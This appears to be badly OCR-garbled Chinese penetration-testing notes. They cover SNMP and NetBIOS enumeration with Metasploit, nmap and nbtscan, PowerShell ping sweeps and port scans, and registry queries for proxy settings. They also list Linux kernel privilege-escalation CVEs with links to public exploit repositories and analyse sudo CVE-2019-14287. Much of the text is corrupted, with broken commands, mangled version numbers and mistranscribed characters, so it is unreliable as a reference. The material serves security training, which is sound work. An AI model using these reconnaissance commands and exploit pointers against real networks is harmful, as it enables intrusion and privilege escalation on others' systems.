open|filtered fjicl-tep-a 
open[filtered 4 
open| filtered 


ETC: 


up ee 
shown: 


latency). 
999 open|filtered 
STATE SERVICE 


/udg open netbios-ns 


MAC Address: 
scan report for 192.168.1.101 
1 P M 16s ne 


Yen 


BIG 
0:17:29 elapsed; 252 hosts ig e yi {3 


ta 
i 


F2 


awe 


(3 
18 
(3 
22 


2 


.168.1.101 giving up on port because retransmission cap hit (6). 


up), 3 undergoing UDP Scan 
(0:00:18 remaining) 
up), 3 undergoing UDP 
(0:01:27 remaining) 
up}, 3 undergoing UDP 
(0:01:34 remaining) 
up), 3 undergoing UDP 


Scan 


Scan 


Scan 


3:29 (0:00:00 remaining) 





msf » use auxiliary/scanner/snmp/snmp. enum 


aUxLiiaryisnnp. enum) 
Module options (auxiliary/scanner/snmp/snmp_enum): 


Name Current Setting Required Description 


COMMUNITY public y SNMP Community String 

RETRIES 1 ] SNMP Retries 

RHOSTS y The target address range or CIDR identifier 
RPORT 161 yes The target port (UDP) 

THREADS yes The number of concurrent threads 

TIMEOUT SNMP Timeout 


VERSION 


msf auxiliary (snmp enum) > set THREADS 10 


4 










IP addresses to scan 


Hostname/IP [1921681 100 | Start IP End IP 
192.168.1.1 192.168.1.250 

Start IP x|| 192.169. 1 . 1 

End IP xi] 192.168. 1 . 250 


Read IPs from file | 


SNMP ports to scan SNMP community string Scan control 


i Vv (* Just try this one name [public [5 | 
g K 
vA [7 C Multiple names from list | 0 Timeout {ms} | 2000 了 [m | 


[P [Pot [Name [Descipton LL 











Scanned: 416/1500 
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, - NetCrunch Network Tools 





192.168.1.1 192.168.1250 
250 nodes in range 


SNMP Scanner 


This tool can help you check for basic device information of 
SNMP nodes on a given network. 


e Scanner 
t Scanner 


NMP Scanner 


ST Snmp for | 
项 目 
:-/Desktop/snmps . /snmpbv.pl 


"snmpbw.pl target community timeout threads" 
./snmpbw.pl 192.168.0.1 public 
./snmpbw.pl ipfile.txt public 
! ! :public or what ever the community string is 
eout  :Timeout is in seconds 

‘number of threads to run 









.~/Desktop/snmp# ./snmpprs. pl 


"enmpprs.pl QutputFile" 
à ./snmpprs.pl results. txt 
3mple-2 ^ ,/snmpprs.pl /home/location/results. txt 


JtFile ;File name and path where you want the data writen too 
PN = es wees 





rootgJohn:-* snmpbulkwalk 

Created directory: /var/lib/snmp/mib indexes 
No hostname specified. 

USAGE: snmpbulkwalk [OPTIONS] AGENT [OID] 


Version: 5.7.3 
Web: http: //wwv.net-snmp.org/ 
Email: net-snmp-cadersalists.sourceforge.net 


OPTIONS: 
--help display this help message 
display configuration file directives understood 
' 1|2c|3 specifies SNMP versjon to use 
--version display package version number 
> Version 1 or 2c specific 
COMMUNITY set the community string 
Version 3 specific 
PROTOCOL set authentication protocol (MD5|SHA) 
PASSPHRASE set authentication protocol pass phrase 
ENGINE-ID set security engine ID (e.g. 800000020109840301) 
ENGINE-ID set context engine ID (e.g. 800000020109840301) 
LEVEL set security level (no&uthNoPriv|authNoPriv|authPriv) 
1 CONTEXT set context name (e.g. bridgel) 
-u USER- NAME set security name (e.g. bert) 
-x PROTOCOL set privacy protocol (DES|AES) 
-X PASSPHRASE set privacy protocol pass phrase 
Z BOOTS, TIME set destination engine boots/time 
General communication options 


rootüJohn:-€ snmp-check 

[!] You need specify a IP address target! 

rootàüJohn:-$ snmp-check -h 

snmp-check v1.9 - SNMP enumerator 

Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org) 


Usage: snmp-check [OPTIONS] «target IP address» 


--port : SNMP port. Default port is 161; 
--community | : SNMP community. Default is public; 
--version ; SNMP version (1,2c). Default is 1; 


--write * detect write access (separate action by enumeration); 


--disable tcp : disable TCP connections enumeration! 
- timeout : timeout in seconds. Default is 5; 
--retries : request retries. Default is 1; 
--info : show script version; 

--help ; show help menu; 





vww.net-snmp.org/ 
mp-codersglists.sourceforge.net 


display this help message 
display configuration file directives understood 
specifies SNMP version to use 
display package version number 
specific 
set the community string 
3 specific 
authentication protocol (MD5|SHA) 
authentication protocol pas as 
security engine ID (e.g. 109840301) 
context engine ID (e.g. 20109840301) 
security level (no&uthNoPriv|authNoPriv|authPriv) 
context name (e.g. bridgel) 
security name (e.g, bert) 
privacy protocol {DES| AES) 
SSPHRASE privacy protocol p phrase 
OTS, TIME set destination engine boots/time 
communication options 
r MZ set the number of retries 
t TIMEOUT set the request timeout (in seconds) 
ebugging 
d dump input/output packets in hexadecimal 


ENGINE-ID 
EVEL 
EXT 


now 9) uy «c w 


Q ov ü 





Ws: 

Use auxiliary/scanner/snmp/aix version 

Use auxiliary/scanner/snmp/snmp enum 

Use auxiliary/scanner/snmp/arris dg950 

Use auxiliary/scanner/snmp/snmp enum hp laserjet 
Use auxiliary/scanner/snmp/brocade enumhash 

Use auxiliary/scanner/snmp/snmp enumshares 

Use auxiliary/scanner/snmp/cambium snmp loot 

Use auxiliary/scanner/snmp/snmp enumusers 

Use auxiliary/scanner/snmp/cisco config tftp 

Use auxiliary/scanner/snmp/snmp login 

Use auxiliary/scanner/snmp/cisco upload file 

Use auxiliary/scanner/snmp/snmp. set 

Use auxiliary/scanner/snmp/netopia enum 

Use auxiliary/scanner/snmp/ubee ddw3611 

Use auxiliary/scanner/snmp/sbg6580 enum 

use auxiliary/scanner/snmp/xerox workcentre enumusers 
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^N netee 


‘Desktop/snmps . "n 


an't locate Met^ddr/IP.pm C (you may need to install the NetAddr: 


ocal/share/pe 24, -gnu/perl 
/local/lib/site perl / lib/x86 64-linux-gnu/perl-base) at 
BEGIM failed--compilation aborted at ,/snmpbw.pl line 8. 


NetAddr-IP-4.( 
' 1:561 
n.org. iw 
aiting r 
[application 


“saved [21 
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:IP modi 





top/snmp& tar xvzf ./NetAddr-IP-4.078. tar.gz 


Me 
inet n2ad.t 


yaddcone Stt 

binet n2dx.t 

naip gethostbyname.t 
/mode.t 

bin.t 

leftshift.t 

ipv6 ntoa.t 


binet .pton. t 


inte t 
bpackzeros.t 
bcdn2bin.t 
notcontiquous.t 


binet. ntoa.t 
bipy4_ inet. t 


ZUtll pv6 anyZn.t 
/Util/t/inet pton.t 
j mpl28,t 





rootQüJohn:-/Desktop/snmp£& cd NetAddr-IP-4.078/ 
rootQJohn: -/Desktop/snmp/NetAddr-IP-4.0784 ls 

ZAbout-NetAddr-IP.txt Artistic Changes Copying docs IP.pm Lite Makefile.PL 
rootQJohn:-/Desktop/snmp/NetAddr-IP-4.0784 perl Makefile.PL 


nE > 
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ohn: -/Desktop/snnp/Netàddr-IP-4.078$ perl Makefile.PL 


This build requires a C compiler by default except on Windows where 
the Pure Perl version is mandatory. The Pure Perl version, which does 
not require compilation of XS code, can be used by invoking this as: 


perl Makefile.PL -noxs 








Versions 3.21 and above of NetAddr::IP, include hooks for the Storable 
class that are incompatible with the old (automatic) method of storing 
data. To regain backwards compatibility, the module must be useí)d as 


use NetAddr::IP ':old storable'; 
which will disable the new hooks and revert back to the old wavs. 


If you do not use Storable along with NetAddr::IP, or just don't know 
what this all means, most likely you're safe to go ahead. 


Versions before 3.25 recognized by default IP addresses as returned by 
inet_aton. This is no longer the default. To enable this behavior 
again, the module must be use{)d as 


use NetAddr::IP ':aton'; 


root@John:~/Desktop/snmp/NetAddr-IP-4.078# make 


rootaJohn: -/Desktop/snmp/Net4ddr-IP-4.078$ make 

cp IP.pm blib/lib/NetAddr/IP.pm 

&utoSplitting blib/lib/NetAddr/IP.pm (blib/lib/auto/NetAddr/IP) 
make[1]: Entering directory '/root/Desktop/snmp/Net&ddr-IP-4.078/Lite' 
cp Lite.pm ../blib/lib/NetAddr/IP/Lite.pm 


AutoSplitting ../../blib/lib/NetAddr/IP/Util.pm (../../blib/lib/auto/NetAdd 
cp lib/Net&ddr/IP/UtilPP.pm ../../blib/lib/Net&ddr/IP/UtilPP.pm 
AutoSplitting ../../blib/lib/NetAddr/IP/UtilPP.pm (../../blib/lib/auto/NMetAq 
cp lib/NetAddr/IP/InetBase.pm ../../blib/lib/NetAddr/IP/InetBase.pm 
&utoSplitting ../../blib/lib/NetAddr/IP/InetBase.pm (../../blib/lib/auto/Ne 
cp Util IS.pm ../../blib/lib/NetAddr/IP/Util IS.pm 

Running Mkbootstrap for NetAddr::IP::Util () 

chmod 644 "Util.bs" 

"/usr/bin/perl" "/usr/share/perl/5.24.l1/ExtUtils/xsubpp"  -typemap "/usr/s 
mv Util.xsc Util.c 

x86 64-linux-gnu-gcc -c -D REENTRANT -D GNU SOURCE -DDEBIAN -fwrapv -fno-s 
SET BITS=64 -02 -q  J-DVERSION-X"1.53X" -DXS VERSION-X"1.53X" -fPIC "-I/usr 
rm -f ../../blib/arch/auto/Net&ddr/IP/Util/Util.so 

x86 64-linux-gnu-gcc  -shared -L/usr/local/lib -fstack-protector-strong Uti 


chmod 755 ../../blib/arch/auto/Net&ddr/IP/Util/Util.so 
- Util.bs ..7../7D 








onn: /Desktop/snmp/NetAddr -IP-4.6784 make install 


pesktop/snnp/NetAddr-IP-4.078$ make install 
ring directory '/root/Desktop/snmp/NetAddr-IP-4.078/Lite' 
ng directary '/root/ /Desktop/snmp/NetAddr- IP-4.078/Lite/Util' 
ap for NetAddr::IP::Util () 
bs" 
documents 
g directory. '/root/Desktop/snmp/NetAddr-IP-4,078/Lite/Util' 
T ocument sj 
g directory '/root/Desktop/snmp/NetAddr-IP-4.078/Lite' 
pod document 


1.1 /aüto/Ne ddr; 
.24. 1/auto/NetAdd 
24,1 /auto/NetAddr, 
.l/auto/NetAdd 
.Lfauto /NetAdd 
/5.24.1/auto/NMetAdd 
6! 64. di: qnu/ NUES 1/auto/NetAddr/I 
| 64- Hinux- CU a ,1/aUto/NetAddr, 
ae 


4,1 /auto/NetAddr 
/lfauto/Netaddr 


6 x 
6 64-linux-gnu/| { .l/auto/Net&ddr; HX 
x8 64- linux-gn ir1/5. 24. 1/auto/NetAddr/IP/do prefix.al 
|. 64- lanux-gnu/per 1/5. 24.1/auto/NetAddr/IP/hostenum. al 
86 64-linux-gnu/perl/5. 24. 1/auto/Net&ddr/IP/short.al 
) 64- linux-gnu/perl/ ; RUE MED AP/ Compact v6.al 


c gnu/pert/ "A/auto/NetAddr / P/Util utos 
gnu/perl/S. FITSUEOTNO DANGLY IF/InetEd l 
X S 


~/Desktop/snmp# ./snmpbw.pl 
nmpbw.pl target community timeout threads” 


nmpbw.pl 192.168.0.1 public 2 1 


. /stimpbw. pl ipfile.txt public 2 4 


‘public or what ever the community string is 
: Timeout is in seconds 
;number of threads to run 
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基于 netbios 发 现 内 网 存活 主机 


netbios 简 介 : 


nmap 扫 描 ; 






root@John:~# nmap -SU --script nbstat.nse -p137 192.168.1.0/24 -T4 


todtaoJohn:-$ nmap -sU --sc t nbstat.nse -p137 192.168.1. 


Starting Nmap 7.40 ( https://nmap.orq ) at 2017-12-0 
Nmap sc: A 

Host is up (0.017s la } 

PORT STATE SERVICE 

137/udp closed netbios-ns 

MAC Address: 


Nmap scan report for 192,168.1.100 
Host is up (80.0 latency). 

PORT STATE SERVICE 

137/udp open th 

MAC Address: 


H script results; 
|nbstat: NetBIOS name: JOHN-PC, NetBIOS user: <unknown>, NetBIOS MAC 


Nmap scan report for 192.168.1.107 
Host is up (0.000079s latency) 
PORT STATE SERVICE 

137/udp closed netbios-ns 


scanned in 2.89 seconds 


msf 扫 描 : 
msf > use auxiliary/scanner/netbios/nbname 


mst > use guxiliary/scanner/netbios/nbname 
auxiliary i show options 


Module options (auxiliary/scanner/netbios/nbname): 


to probe in each set 
target add range or CIOR identifier 
e target po DP) 
e number of concurrent threads 


e) » eet RHOSTS 192.16 0/24 
1.0724 
e) » run 


reque 







02.168.1.100. |JOHN-P (GROUP). / (192.168.136.1, 192.168.1.1, 192.168.1.100, 10.11,3.18) 










Bo : //www.unixwiz.net/tools/nbtscan.html 


Pecan-1.0.35.exe -m 192.168.1.0/24 









can-1.8.35.exe -m  192.168.1.0/24 
1.180.  WORKGROUP\JOHN-PC 


使 用 NBI B TCP/IP 5id& 


和 当前 1 
] NetBIOS), 


iP EB) 


[ [-a RemoteName] [-A IP address] [-c] [-n] 
[-rl [-R]1 [-RR] [-s1 [-S1 [intervall] 1] 


E i 
ERM IP 全 请 家 
P 地 址 转换 成 1 | NETBIOS 名 称 的 会 话 去 。 
局 动 刷新 


moteName uma wb Ie 
P address } P 7 NS sf IP 地 址 。 att 
iterval + ] EH r ^ i dr tap ed 
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D:onbtstat -n 


本 示 连 接 : 
Fors IP dE: (6.0.6.6) 范围 ID: t1 


缓存 中 没有 名 称 


本 地 连接 * 9: 
节点 IP HH: (@.6.6.61 范围 ID: 1) 


组 在 中 没有 名 称 


本 地 ipe 4: 
5d IP Mb: re.e.8.01 范围 ID: r1 


缓存 中 没有 名称 


Muare Network Adapter UMnet1: 
Pps IP 址 址 : (192.168.136.111 范围 ID: 


NetBIOS 本 地 名 称 表 





JOHN-PC «gu» 
UORKGROUP «9g» 
JOHN-PC <20> 
WORKGROUP <1E> 
WORKGROUP <1D> 
... MSBROUSE . . 81» 


Muare Network Adapter UMnet8: 
节点 IP dik: r192.168.1.11 范围 ID: 


NetBIOS 本 地 名 称 表 


Eus 类 型 





JOHN-PC «88» n= 
WORKGROUP «89» 
JOHN-PC «28» ie 
WORKGROUP ar» 2H 


节点 IP BE [192.168.1.10801 范围 ID: 


NetBIOS 本 地 名 称 直 


名 称 
JOHN-PC 
WORKGROUP 
JOHN-PC 
WORKGROUP 














Desktop/nbtscan# tar -zxvf ./nbtscan-source-1.0.35.tgz (1.5.1 版 本 
~/pesktop/nbtscan# make 
onn: /Desktop/nbtscan# nbtscan -r 192.168.1.0/24 


pesktop/nbtscan# nbtscan -r 192. 
„me scan for addresses from 192.1 


User MAC addr 
Sendto failed: Pe n denied 
<unknown> <unknown> 
JOHN-PC «server». <unknown> 
1 denied 


:~/Desktop/nbtscan# nbtscan -v -s: 192.168.1.0/24 
1.0 Sendto failed: Permission denied 


1.100: JOHN-PC 


ORKGROUP : 00G 
OHN- PC : 290U 
:leG 


^ 
3 
A 
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T tps: //pan.baidu.com/s/1hs8ckmg 密码 : av40 

n version 1.5.1. Copyright (C) 1999-2003 Alla Bezroutchko. 
a free software and it comes with absolutely no warranty. 
use, distribute and modify it under terms of GNU GPL. 


[-v] [-d] [-e] [-1] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] 
verbose output. Print all names received 
from each host 
dump packets. Print whole packet contents. 
Format output in /etc/hosts format. 
Format output in lmhosts format. 
Cannot be used with -v, -s or -h options. 
-t timeout wait timeout milliseconds for response. 
Default 1000. 
bandwidth Output throttling. Slow down output 
so that it uses no more that bandwidth bps. 
Useful on slow links, so that ougoing queries 
don't get dropped. 
use local port 137 for scans. Win95 boxes 
respond to this only. 
You need to be root to use this option on Unix. 
Suppress banners and error messages, 
. «S separator Script-friendly output. Don't print 
column and record headers, separate fields with separator. 
Print human-readable names for services. 
i Can only be used with -v option. 
| -m retransmits Number of retransmits. Default 0. 
_ -f filename Take IP addresses to scan from file filename. 
| -f - makes nbtscan take IP addresses from stdin. 
| «scan range» what to scan. Can either be single IP 
like 192.168.1.1 or 
range of addresses in one of two forms: 
DOONAN XXX. XXX/XX OF XXX. XKX XXX DOES 
(amples: 
| nbtscan -r 192.168.1.0/24 
Scans the whole C-class network. 
|. Dbtscan 192.168.1.25-137 
Scans a range from 192.168.1.25 to 192.168.1.137 
nbtscan -v -s : 192.168.1.0/24 
Scans C-class network. Prints results in script-friendly 
format using colon as field separator. 
Produces output like that: 
192.168.0.1:NT SERVER: 00U 
192.168.0.1:MY_DOMAIN: 00G 
192.168.0.1:ADMINISTRATOR: 03U 
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192.168.0.2:0THER BOX:09U 
nbtscan -f iplist 
Scans IP addresses specified in file iplist. 


NBTscan version 1.5.1: 
项 目地 址 : https://github.com/scallywag/nbtscan 
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Powershell 一 条 命令 行进 行内 网 扫描 
则 系统 类 型 


E344 | * { $a = $_; 128..140 | % ( $b = $ ; ping -n 1 -w 10 "192.168.$a.$b" | 
gect-string TTL | % ( if ($ -match "ms") ( $ttl = $ .line.split('-')[2] -as 
ipt]; if ($ttl -lt 65) ( $os = "Linux" } ElseIf ($ttl -gt 64 -And $ttl -lt 129) 
$0s = "Windows" } else ( $0s = "Cisco"; write-host "192.168.$a.$b OS: $0s"; 
ho "192.168.$a.$b" >> scan results.txt 33) } 














"3-AASECERÉSIP, 128..140:8 DERBIP 


/^" Windows2008 Windows 71k Bs 


lows PowerShell -/5) x 


dministrator> 44 | x € $a = $_; 128..148 1 x < $b = $_3 ping -n 1 -w 18 "192.168.$a.$b" 1 select-string TITLE 
( _ -match "ms"7《 $ttl = $_.line.split¢’=’>[2] -as Lint]; if <$ttl -lt 65> < Sos = “Linux” > Elself <$ttl -gt 
4 -And $ttl ~lt 129> < $0s = “Windows” > else € $0s = “Cisco”>; write-host "192.168.$a.$b OS: $os"3}> > 
| 168.44.129 OS: Windows 
E /192.168.44.133 OS: Windows 


jing 扫描 


1 单线 程 扫描 


1..255 | % (echo "192.168.44.$ "; ping -n 1 -w 190 192.168.44.$ ) | Select- 
"String ttl 








Windows2008 Windows 7&1) Be 


4: Binders PowerShell 
C: Wsers Administrator? 128..135 I x (echo '"192.168.44.$9 ing -n 1 -w 1 192.168.44.$ 5 ! Select-String ttl 


192.168.44.129 的 回复 : 字 节 =32 aine TTL=128 
192.168.44.133 的 回复 : 字 节 =32 BjlBlims TIL-128 


1. 并 行 扫描 


- Workflow ParallelSweep ( foreach -parallel -throttlelimit 4 ($i in 1..255) (ping 
A 1 -w 100 192.168.1.$i}}; ParallelSweep | Select-String ttl 





Lsthrottlelimit 4 - 4 并 行 线程 数目 


s? workflow ParalleiSweep { foreach -parallel -throttlelimit 10 ($i in 1..255) (ping -n 1 — 100 192.168. 44. $i]) ; 





ParallelSweep | Select-String ttl 






lms TTL=64 
üj-4ms TTL=128 
时 间 (lms TIL-128 


1. 单线 程 扫描 192.168.44.133 的 1-1024 端 口 


1..1024 | % (echo ((new-object 
Net Sockets. TcpClient) .Connect ("192.168.44.133",$_)) "Port $ is open!"} 2>$null 


1239 


中 


[PS Cz: Users Administrator? 88..445 i z (echo <<new-object Het.Sockets.TcpClient?.Connect("192.168.44.133",$ 5) “Port wr 


llis open!'? 2»$null 





1. 扫描 指定 端口 的 所 有 IP 


foreach ($ip in 132..254) (Test-NetConnection -Port 80 -InformationLevel 
"Detailed" 192.168.44.$ip} 


PS C:\Users\Asus> foreach ($ip in 132..254) (Test-NetConnection -Port 80 —InformationLevel "Detailed" 192. 168.44 $ip} 


} 





ComputerName : 192. 168. 44. 132 
RemoteAddress > 192. 168. 44. 132 
RemotePort : 80 
NameResolutionResults  : 192. 168.44. 132 
MatchingiPsecRules 1 
NetworkIsolationContext : Internet 
IsAdmin : False 
InterfaceAlias : WLAN 
SourceAddress : 192. 168. 1. 101 
NetRoute (NextHop) > 192.168. 1.1 
PingSucceeded 

PingReplyDetails (RTT) 

TepTestSucceeded 


ComputerName : 192. 168. 44. 133 
RemoteAddress : 192.168. 44. 133 
RemotePort : 80 
NameResolutionResults =: 192. 168. 44. 133 
MatchingIPsecRules 7 
NetworklsolationContext : Internet 
IsAdmin : False 
InterfaceAlias : VMware Network Adapter VMnet8 
SourceAddress : 192. 168. 44.1 
NetRoute (NextHop) : 0.0.0.0 
TcpTestSucceeded d 





1. 自 定义 IP 范 围 和 端口 范围 


1..20 | % { $a = $_; 1..1024 | % (echo ((new-object 
Net.Sockets.TcpClient).Connect("192.168.1.$a",$ )) "Port $ is open!"} 2>$null} 


PS C:Wsers\Asus> 133..134 | & | $a = $., 80..81 | % (echo ((new-object Net. Sockets. TcpClient).Connect(^192. 168. 44. $a”, $ 2). 7192. 168.44. $a : Port $_ is open! ^] 2>$null) 





192. 168.44. 133 : Port 80 is open! 
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$ E A 网 代理 
mitis (OS uL DUOBUS 


des 
ro 


BERHCRUR 5810x861 EUG JH T RS 9€ VPN 3E 0 


[5.15.4554 om: [80 高 级 [0] | | 
. xm 


表 获取 ie 代理 : 


ery "HKEY_USERS\S-1-5-21-xxxXxxxx- yyyyyyy -3154576422- 
Ft fare\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer 


à 的 ID (S-1-5-21-936368944-xxxxxxxx-yyyyyyy-500) 都 不 同 ， 可 以 先 通 过 user2sid 获 取 用 
> 然后 查询 该 用 户 的 ie 代理 。 
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2 直接 查询 HKEY_CURRENT_USER 





reg query "HKEY CURRENT USERNSoftwareMMicrosoftNwWindowsNCurrentVersionNInternet 
Settings" /v ProxyServer 


1 6.1. 76011 i 
:所 有 <c) 2009 Microsoft Corporation. REPA 


t=NUsers\Administrator>reg query “HKEY CURRENT. USER\Sof tware Microsoft Windowse 
iwrentUersion\Internet Settings” /u ProxyServer 


KEY CURRENT _USER\Software Wlicrasoft Nlindows NCurrentUersion Internet Settings 
ProxyServer REG. SZ 15.15.45.54:86 





pac 代 理 


设置 如 下 : |! 
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BAREA 
自动 配置 天 本 (S) 


(R) fite:id:Istdsat.pad 





i 


通过 ID 查询 







Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v 
toConfigURL 









croveft Windows \CurrentVersion\Internal Settings 
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2 直接 查询 HKEY_CURRENT_USER 


» 


reg query "HKEY_CURRENT_USER\Sof tware\Microsoft\windows\CurrentVersion\Internet 
Settings" /v AutoConfigURL 


Rdninistrator reg query SURE I icrosoft Windows 
rrentUersion*Internet Settings" 


KEY CURRENT_USER\Sof tware Microsoft Windows CurrentUlersion\Internet Settings 
fiutoConf 19URL REG. SZ file:///d:7sfdsaf.pac 
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操作 系统 提 权 


1246 


nm 
t 
N 
四 








Linux 提 权 - 依 赖 exp 篇 (第 二 课 ) 


exp 注 : 
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ii 


4000367 [Sudo] 
.6p7 - 1.8.20) 





















7-1000112 [a memory corruption due to UFO to non-UFO path switch] 


[Samba Remote execution] 
5.0-4.6.4/4.5.10/4.4.14) 


17-7308 [a signedness issue in AF PACKET sockets] 
kernel through 4.10.6) 
i 


-6074 [a double-free in DCCP protocol] 
ernel through 4.9.11) 


17-5123 ['waitid()'] 
4.14.0-rc4*) 


16-9793 [a signedness issue with SO SNDBUFFORCE and SO RCVBUFFORCE sock: 
IX kernel before 4.8.14) 


16-5195 [Dirty cow] 
Ux kernel>2.6.22 (released in 2007)) 


16-2384 [a double-free in USB MIDI driver] 


lux kernel before 4.5) 
I 


-2016-0728 [pp key] 
Seed, 3.8.2, 3.8.3, 3.8.4, 3.8.5, 3.8.6, 3.8.7, 3.8.8, 3.8.9, 3.9, 3.16€ 


-2015-7547 [glibc getaddrinfo] 
fore Glibc 2.9) 


015-1328 [overlayfs] 
; 3.16.0, 3.19.0) 
014-5284 [OSSEC] 


[ptrace] 


[Local Privilege Escalation] 






VE-2014-3153  [futex] 
8 3.3.4 ,3.3.2 ,3.2.13 3.229 2222211101000 3:8/8 75.0.4 3.0.2 ,3.0.1 ,2 


SVE -2014-0196 [rawmodePTY] 
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(2.6.31, 2.6.32, 2.6.33, 2.6.34 2 6035082565808 26.37, 2.6.38, 2.6.39; 3 
- " ” 4 z 

CVE-2014-0038 [timeoutpwn] 

(3.4, 3.5, 3.6, 3.7, 3.8, 3.8.9 3-0 MS JONS S12, 3.13, 3.4.0, 3.510 


CVE-2013-2094 [perf_swevent] 
(320.0; 3.0.15 3,0.2, 3.0.3, 2:0:4 OS SOES lO 3.2, 3.9, 3.4.0, KA 


CVE-2013-1858 [clown-newuser] 
(3.3-3.8) 


CVE-2013-1763 [sock diag rcv msg] 
(before 3.8.3) 


CVE-2013-0268 [msr] 1 
(26118 £26119, 2.620126: 21 C2622 2.0.23. «2.61245.2.8,251 2.6.26, 2.6.27, 


CVE-2012-3524 . [libdbus] 
(libdbus 1.5.x and earlier) 


CVE-2012-0056 [memodipper] 
(2:56:39, 8,0:0/93.0:1593.0722 53:013, 7 3:0:4 03:055 53:046: 35:170) 


CVE-2010-4347 [american-sign-language] 
( 20r 2.01; 20:2 2.0.3, 240:4; 260-5, 025010, 206.7 2-028; 2.6.9, 2E 


CVE-2010-4258 [full-nelson] 
C631, 2.6.32, 2.6.35, 2.6.37) 


CVE -2010-4073 [half_nelson] 
(GO, UO 262 2 03 26 Aa 265 20 on 26 Casi, 26-9 2.6.10 


ND 


CVE-2010-3904 [rds] 
(2.6.90, 2.6.91, 2.6.32, 2.6.33, 2.6.94, 2.6.35, 2.6.36) 


CVE-2010-3437 [pktcdvd] 
(6162-6. 4, 2 602s. 2.659, 2.5.4, 2,6.5, 2:86.98, 2.6.7, 2.0.8, 2,0.09, 2.8. 107 


MY 


CVE-2010-3301 [ptrace kmod2] 
(256.204 2065277 2.6.28; 2.0729, 8250: 30082 Onell 2.6.32, 2.6.33; 2.6134) 


CVE-2010-3081 . [video4linux] 
(2.6.0, 2,071, 2:6.2, 2.6.9, 2.0.4, 2,001902 0:8) 2:6. 7, 2.6.9, 2.6-9, 2.6.10; 


NY 


CVE-2010-2959 [can bcm] 
(2.6.18, 2.6.19, 2.6.20, 2.6.21, 2.6.2292 DONT 0004 26:25, 2.0.26, 2.0: 21 


CVE-2010-1146 [reiserfs] 
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| 2.6.19, 2.6.20, 2.6.21, 2.6.22, 2.6.23, 2.6.24, 2.6.25, 2.6.26, 2.6.27, 


* 


























Jj bes à # ? 
0-0415 [do_pages_move] 
|, 2.6.19, 2.6.20, 2.6.21, 2.6.22, 2.6.23, 2.6.24, 2.6.25, 2.6.26, 2.6.27, 


0 [pipe.c_32bit] 
, 2.4.5, 2.4.6, 2.4.7, 2.4.8, 2.4.9, 21414002021 em ANTONIA 19, 24.1 


[udp sendmsg 32bit] 
MEME D, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 2.6.7, 2.6.8, 2.6.9, 2.6.10, 206-11, 


[sock sendpage] 
EN 2:4.6, 2.4.7, 2.4.8, 2.4.9, 2.4.10, 2.4.11, 2:4:12/|.2;4,13, 2.4.1 


[sock sendpage2] 
NS 4.5, 2.4.7, 2.4.8, 2.4.9, 2.4.18, 2:4011 212. 2.4.13, 2.4.1 


[exit notify] 
DN 2/6.26, 2.6.27, 2.6.28, 2.6.29) 


-1185 [udev] 
EN276.-26, 2.6.27, 2.6.28, 2.6.29) 


2008-4210 [ftrex] 
MEE 6.12, 2.6.13, 2.6.14, 2.6.15, 2.6.16, 2.6.17, 2.6.18, 2.6.19, 2.6.20, 


-2008-0600 ^ [vmsplice2] 
j.23, 2.6.24) 


008-0600 [vmsplice1] 
6.17, Bonito 2.6119 7256-20, 2.60721, 20:22; 2.60:237 2:6424; 02.6: 24:0) 


-2006-3626 [h00lyshit] 
ME 6.10, 2.6.11, 2.6.12, 2.6.13, 2.6.14, 2.6.15, 2.6.16) 


-2006-2451 [raptor prctl] 
82.6.14, 2.6.15, 2.6.16, 2.6.17) 


E-2005-0736  [krad3] 
Beep, 2.6.7, 2.6.8, 2.6.9, 2.6.10, 2.6.11) 


/E-2005-1263 [binfmt elf.c] 
BGkernel 2.x.x to 2.2.27-rc2, 2.4.x to 2.4.31-pre1, and 2.6.x to 2.6.12-rc4 


VE-2004-1235  [elflbl] 
2.4.29) 


*VE-N/A [caps to root] 
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(2.6.34, 2.6.35, 2.6.36) 

* ee 
CVE-2004-0077 [mremap pte] 
(2.4.28, 2.2.24, 2.4.25, 2.4.20, 9 421] 


已 对 外 公开 exp 注 : 


https://github.com/SecWiki/linux-kernel-exploits 
https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/ 
https://github.com/xairy/kernel-exploits 
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和 6 漏洞 分 析 (CVE-2019-14287) 
1 漏洞 介绍 
的 国 外 的 团队 跟踪 并 披露 了 该 漏 润 ， 报 告 中 发 现 ， 在 所 有 sudo 版 本 低 于 1.8.29 的 Linux 机 器 ， 


半生 以 使 用 户 拥有 权限 运行 其 他 用 户 命令 


Rra” 


AFERE Arot AP RARAS, REF Esudo id 在 1.8.28 之 前 的 版 本 中 以 任意 用 
MTA, 虽然 攻击 的 利用 方式 ， 需 要 对 本 地 配置 进行 修改 ， 利 用 此 漏洞 需要 恶意 
让 有 以 任何 用 户 (root 用 户 除外 ) 身份 运行 命令 的 特权 ， 如 果 sudoers 文 件 ALL 中 Runas 参 数 带 
Sma, MUELLER REL 


时 的 Linux 机 器 上 运行 一 下 命令 


udo -V | grep 'Sudo version' 


站 要 看 是 否 受 到 该 版 本 ( 低 于 1.8.29) 的 影响 


x03 漏洞 分 析 
程序 本 身 是 一 个 设置 的 SUID 位 的 二 进 制 文件 。 我 们 可 以 检查 一 下 他 的 权限 : 


ls -l /usr/bin/sudo 


t ls -l /usr/bin/sudo 
rwsr-xr-x 1 root root 136808 Jun 11 06:53 /usr/bin/sudo 


的 所 有 者 是 root 所 以 每 个 用 户 都 已 像 root 那 样 执行 该 程序 。 设 置 了 SUID 的 程序 在 运行 时 可 以 给 使 
者 以 所 有 者 的 EUID 


国 o 的 配置 都 记录 在 /etc/sudoers 文 件 中 ， 配 置 文件 知名 哪些 用 户 可 以 执行 哪些 命令 。 要 使 用 
pido, 用 户 只 须 提供 sudo 用 户 的 密码 。 


BAAR BBR SHE 
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sudo -uusername#uidUSer 


因为 需要 用 户 执行 此 命令 ， 那 么 需要 用 户 的 sudoers 中 的 runas 说 明 具 有 特殊 值 ALL 


查看 一 下 /etc/sudoers 


# Please consider adding local content in /etc/sudoers.d/ instead of 

# directly modifying this file. 

# 

# See the man page for details on how to write a sudoers file. 

# 

Defaults env_reset 

Defaults mail_badpass 

Defaults secure_path="/usr/local/sbin: /usr/local/bin: /usr/sbin: /usr/bin: /sbin:/bin:/snap/bin' 


# Host alias specification 

# User alias specification 

# Cmnd alias specification 

#U privilege specification 

testuser ALL-(ALL:ALL) ALL 

# Members of the admin group may gain root privileges 


